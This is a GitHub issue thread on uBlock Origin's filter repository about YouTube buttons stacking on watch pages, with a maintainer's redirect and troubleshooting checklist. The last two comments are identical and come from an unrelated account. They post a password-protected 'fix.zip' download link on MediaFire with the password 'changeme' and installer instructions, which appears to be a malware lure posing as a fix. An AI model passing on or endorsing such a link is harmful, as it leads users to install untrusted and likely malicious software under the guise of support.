### ISSUE TITLE
youtube.com: nuisance

### ISSUE THREAD

**Issue by sharkpog** [uBlockOrigin/uAssets#25032]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.youtube.com/watch`

### Category

nuisance

### Description

something weird is going on today. the videos are doing excellent, but most videos have a random nuisance. the nuisance stacks buttons on top of each other except for the like/dislike ratio.

### Other extensions used

return youtube dislike, ruffle, adblock plus, op auto clicker, twitch chat danmaku, frankerfacez, and twitch chat pronouns

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![Screenshot 2024-08-24 11 17 21 PM](https://github.com/user-attachments/assets/2ae56342-90df-4515-80af-51f57499795c)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium: 127
filterset (summary):
 network: 155020
 cosmetic: 47954
 scriptlet: 22153
 html: 0
listset (total-discarded, last-updated):
 default:
  user-filters: 5-0, never
  easylist: 85516-49, 9m
  easyprivacy: 53067-664, 9m
  plowe-0: 3545-371, 9m
  ublock-badware: 10748-26, 9m
  ublock-filters: 39607-382, 9m
  ublock-privacy: 1071-4, 9m
  ublock-quick-fixes: 197-0, 38m Δ
  ublock-unbreak: 2505-15, 9m
  urlhaus-1: 30530-0, 38m
filterset (user): [array of 5 redacted]
trustedset:
 added: [array of 8 redacted]
switchRuleset:
 added: [array of 31 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 6359 ms (selfie)
 maxAssetCacheWait: 171 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 95
 network:
  youtube.com: 44
  doubleclick.net: 7
  google.com: 44
 extended:
  ##.ytp-featured-product
  ###masthead-ad
  ###player-ads
  ##.ytp-suggested-action > button.ytp-suggested-action-badge
  ##+js(trusted-replace-node-text, script, (function serverContrac…
  ##+js(adjust-setTimeout, [native code], 17000, 0.001)
  ##+js(json-prune-fetch-response, playerAds adPlacements adSlots …
  ##+js(json-prune-xhr-response, playerAds adPlacements adSlots pl…
  ##+js(trusted-replace-xhr-response, '/"adPlacements.*?([A-Z]"\}|…
  ##+js(trusted-replace-xhr-response, /"adPlacements.*?("adSlots"|…
  ##+js(trusted-replace-fetch-response, '/"adPlacements.*?([A-Z]"\…
  ##+js(trusted-replace-fetch-response, '/"adSlots.*?\}\}\],"adBre…
  ##+js(set-constant, ytInitialPlayerResponse.playerAds, undefined…
  ##+js(set-constant, ytInitialPlayerResponse.adPlacements, undefi…
  ##+js(set-constant, ytInitialPlayerResponse.adSlots, undefined)
  ##+js(set-constant, playerResponse.adPlacements, undefined)
  ##+js(json-prune-fetch-response, reelWatchSequenceResponse.entri…
  ##+js(set-constant, yt.config_.openPopupConfig.supportedPopups.a…
  ##+js(set-constant, Object.prototype.adBlocksFound, 0)
  ##+js(set-constant, ytplayer.config.args.raw_player_response.adP…
  ##+js(set-constant, Object.prototype.hasAllowedInstreamAd, true)
```
</details>

**Comment by stephenhawk8054** [comment]
I didn't tell you to open new issue.

**Comment by sharkpog** [comment]
that was the next best thing. you wouldn't let me write a comment, so i made a new issue. besides, in the manual new issue page, there was no way to make a youtube only issue.

**Comment by stephenhawk8054** [comment]
I told you to read and follow the 1st post here: https://github.com/uBlockOrigin/uAssets/issues/20586#issue-1987866378

**Comment by stephenhawk8054** [comment]
# ⚠️ P-L-E-A-S-E, PLEASE, PLEASE, PLEASE read and follow all of the instructions first ⚠️

### Note: After each step, close your current tabs and open new tab to test again or it won't work.
### If you got `282054944` error on player, DO NOT CLEAR COOKIES.

- [X] **I updated uBO to the latest versions (`1.59.0`+)**

<details>
<summary>video tutorial</summary>

https://github.com/uBlockOrigin/uAssets/assets/66517106/2ded936f-bd8c-4de2-abef-66fa05b3cc05

</details>

- [X] **I removed custom config / reset to defaults.** <== This means removing your custom filters (or disabling `My filters)` and disabling ALL additional lists you've enabled manually. It might be quicker to [make a backup of your config and restore to defaults](https://github.com/gorhill/uBlock/wiki/Dashboard:-Settings#backuprestore-section) instead.

<details>

<summary>video tutorials</summary>

https://github.com/uBlockOrigin/uAssets/assets/66517106/3ad8f224-0d06-4572-b95d-e1d6d6ed0e56

https://github.com/uBlockOrigin/uAssets/assets/92610420/4ab9d738-8522-4a27-ac6c-ae30a93e53be

</details>

- [X] **My filter lists are up to date.**

[click this link](https://ublockorigin.github.io/uAssets/update-lists.html?listkeys=ublock-quick-fixes&manual=1) then load Youtube in a new tab. 

- [X] **I completely disabled ALL other extensions AND browser's built-in blockers.** <== They might interfere with our solutions. [However, DO NOT disable "Firefox Multi-Account Containers" add-on](https://www.reddit.com/r/uBlockOrigin/comments/173jmog/comment/k51eodg/?context=3).

Some browsers with built-in blockers
  - Opera, Vivaldi, Brave
  - Edge: Click on "lock" icon at the left of URL bar -> Turn off `Tracking Prevention`

<details>
<summary>video tutorial</summary>

https://github.com/uBlockOrigin/uAssets/assets/66517106/8f36151c-3733-4624-8a01-ccd8c0672b79

</details>

- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.

**Restarting your browser afterwards may help too. On Chromium-based browsers uBO can't reliably block ads after you launched browser or switched profiles including "Open link in incognito" and "Open link as User X". This state of unable-to-block will be kept until you do manual refresh of the page.**

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
